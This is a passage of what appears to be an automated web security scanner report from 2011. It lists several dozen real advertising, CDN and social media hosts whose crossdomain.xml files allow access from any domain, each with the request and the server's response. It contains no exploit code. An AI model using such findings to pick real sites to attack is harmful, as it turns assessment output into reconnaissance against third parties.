<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSche
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.23. http://cdn.cinesport.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.cinesport.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.cinesport.com

Response

HTTP/1.0 200 OK
x-amz-id-2: fsIm3xhYo8+z1NDFMyG3Nrr+SApP93G2V2vlzGBwsnwCxNzNQieDdvqP/oWrLAb4
x-amz-request-id: 470DA743EB7902BE
Date: Thu, 28 Apr 2011 17:03:32 GMT
x-amz-meta-s3fox-filesize: 204
x-amz-meta-s3fox-modifiedtime: 1254865363318
Last-Modified: Tue, 06 Oct 2009 21:49:18 GMT
ETag: "199ac761aefc6dd785276dfea364b271"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 204
Server: AmazonS3
Age: 49988
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: fb2dc2797745e7b9d6ed1908c7d898571b1715801fbbe161891918801b74ff92f9f7aeab96b6d57c
Via: 1.0 8a8618213617600186ecf6bd4987d76d.cloudfront.net:11180 (CloudFront), 1.0 26c110707e0d37c20949c3dad8cf524f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.24. http://cdn.digitalcity.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.digitalcity.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.digitalcity.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 Feb 2009 16:24:41 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/xml
Content-Length: 421
X-N: S
Date: Thu, 05 May 2011 13:02:47 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSche
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.25. http://cdn.eyewonder.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.eyewonder.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=18000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "b2ae8e693141c91:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Age: 11310
Date: Thu, 05 May 2011 01:58:53 GMT
Last-Modified: Fri, 07 Nov 2008 23:34:43 GMT
Expires: Thu, 05 May 2011 03:50:23 GMT
Content-Length: 195
Connection: close

<?xml version="1.0"?>

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

6.26. http://cdn4.eyewonder.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn4.eyewonder.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn4.eyewonder.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:39:19 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.27. http://clk.atdmt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: image/gif
Date: Thu, 05 May 2011 10:52:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.28. http://config.hulu.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://config.hulu.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: config.hulu.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "bbf149a37cb7166ed38ed8229ab4db8a:1189204902"
Last-Modified: Tue, 07 Aug 2007 19:01:37 GMT
Accept-Ranges: bytes
Content-Length: 187
Content-Type: application/xml
Date: Thu, 05 May 2011 10:52:51 GMT
Connection: close

<?xml version="1.0"?>


<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.29. http://content.mqcdn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.mqcdn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: content.mqcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 275
Content-Type: application/xml
Date: Thu, 05 May 2011 00:57:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" secure="true"/>
...[SNIP]...

6.30. http://coverage.mqcdn.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://coverage.mqcdn.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: coverage.mqcdn.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:09 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/plain

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" secure="true"/>
...[SNIP]...

6.31. http://d.tradex.openx.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.tradex.openx.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d.tradex.openx.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:34 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "27e07c-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.32. http://d.xp1.ru4.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.xp1.ru4.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 05 May 2011 00:59:43 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.33. http://d1.openx.org/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "4c3a05-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.34. http://daol.aol.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://daol.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: daol.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:30 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 272
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.35. http://eatps.web.aol.com:9000/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://eatps.web.aol.com:9000
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: eatps.web.aol.com

Response

HTTP/1.1 200 OK
P3P: CP="UNI CUR OUR"
Date: Thu, 05 May 2011 00:59:03 GMT
Content-Length: 101
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.36. http://expapi.oscar.aol.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://expapi.oscar.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: expapi.oscar.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:58 GMT
Server: Apache
Last-Modified: Thu, 12 Oct 2006 16:41:52 GMT
ETag: "8e801a-68-41f9fd940b400"
Accept-Ranges: bytes
Content-Length: 104
Keep-Alive: timeout=1, max=90
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.37. http://external.ak.fbcdn.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://external.ak.fbcdn.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Thu, 05 May 2011 02:51:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.38. http://fls.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Thu, 05 May 2011 02:37:28 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 29735
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.39. http://graph.facebook.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://graph.facebook.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: graph.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Sat, 04 Jun 2011 10:53:06 GMT
X-FB-Server: 10.36.16.105
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

6.40. http://gravatar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gravatar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: gravatar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 10:53:06 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Accept-Ranges: bytes
Content-Length: 261

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.41. http://ib.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 06-May-2011 01:41:27 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.42. http://idcs.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 05 May 2011 01:02:51 GMT
Connection: close
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.43. http://img-cdn.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img-cdn.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Thu, 05 May 2011 00:59:59 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.44. http://img.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img.mediaplex.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:30 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1b1f-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.45. http://lifestream.aol.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://lifestream.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: lifestream.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:27 GMT
Server: Apache-Coyote/1.1
Cache-Control: max-age=2592000
Expires: Sat, 04 Jun 2011 00:58:27 GMT
Content-Type: text/html
Content-Length: 169
Keep-Alive: timeout=5, max=61
Connection: Keep-Alive

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

6.46. http://log30.doubleverify.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://log30.doubleverify.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 01:01:12 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.47. http://metrics.apple.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://metrics.apple.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.apple.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:43:29 GMT
Server: Omniture DC/2.0.0
xserver: www126
Content-Length: 93
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

6.48. http://mobile.aol.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://mobile.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: mobile.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:26 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 202
Keep-Alive: timeout=5, max=999871
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

6.49. http://o.sa.aol.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://o.sa.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: o.sa.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:26 GMT
Server: Omniture DC/2.0.0
xserver: www48
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

6.50. http://pixel.quantserve.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 06 May 2011 00:57:27 GMT
Content-Type: text/xml
Content-Length: 207
Date: Thu, 05 May 2011 00:57:27 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.51. http://portal.pf.aol.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://portal.pf.aol.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: portal.pf.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:45 GMT
Server: Apache
Last-Modified: Wed, 16 Jun 2010 22:15:39 GMT
ETag: "c6-4892d0fd518c0"
Accept-Ranges: bytes
Content-Length: 198
Keep-Alive: timeout=5, max=954
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.52. http://puma.vizu.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://puma.vizu.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:45:36 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n7.panthercdn.com
ETag: "9c515-10d-5c70b100"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Wed, 11 May 2011 07:28:29 GMT
Age: 65827
Content-Length: 269
Content-Type: text/xml
Last-Modified: Fri, 15 Apr 2011 19:51:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...

6.53. http://r.unicornmedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r.unicornmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r.unicornmedia.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 26 Oct 2010 13:18:54 GMT
Accept-Ranges: bytes
ETag: "0736b561075cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 10:51:12 GMT
Connection: close
Content-Length: 218

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cr
...[SNIP]...

6.54. http://r1-ads.ace.advertising.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: r1-ads.ace.advertising.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 10:53:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 05 May 2011 10:53:52 GMT
Content-Type: text/xml
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.55. http://s.gravatar.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s.gravatar.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 05 May 2011 00:59:30 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.56. http://s3.cinesport.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://s3.cinesport.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.cinesport.com

Response

HTTP/1.1 200 OK
x-amz-id-2: vKKd+i/tBK9yQ68lO8U8Y1JeWGUEuVoDdsEaoVjqzdhUlKeU7akoKVLr3eUL2/sL
x-amz-request-id: 4B7E3A998B2B0464
Date: Thu, 05 May 2011 00:57:39 GMT
x-amz-meta-s3fox-filesize: 204
x-amz-meta-s3fox-modifiedtime: 1254865363318
Last-Modified: Tue, 06 Oct 2009 21:49:18 GMT
ETag: "199ac761aefc6dd785276dfea364b271"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 204
Connection: keep-alive
Server: AmazonS3

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.57. http://search.twitter.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://search.twitter.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: search.twitter.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:54:05 GMT
Server: hi
Last-Modified: Tue, 25 Jan 2011 18:03:36 GMT
Cache-Control: max-age=1800
Expires: Thu, 05 May 2011 11:24:05 GMT
Content-Type: application/xml
Content-Length: 206
Vary: Accept-Encoding
X-Varnish: 1922777360
Age: 0
Via: 1.1 varnish
X-Cache-Svr: smf1-aaq-15-sr1.prod.twitter.com
X-Cache: MISS
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.58. http://secure-us.imrworldwide.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://secure-us.imrworldwide.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:41 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Thu, 12 May 2011 00:57:41 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

6.59. http://segment-pixel.invitemedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://segment-pixel.invitemedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Thu, 05 May 2011 01:00:40 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

6.60. http://speed.pointroll.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://speed.pointroll.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 00:56:56 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

6.61. http://sportingnews.122.2o7.net/crossdomain.xml previous next

Summary

